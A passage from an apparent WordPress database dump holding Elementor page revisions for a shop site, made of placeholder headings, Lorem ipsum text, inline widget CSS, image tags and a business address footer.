<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 13:20:26','2022-09-30 07:50:26','',1373,'https://gopalak.in/?p=1509',0,'revision','',0),(1510,1,'2022-09-30 13:20:26','2022-09-30 07:50:26','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" 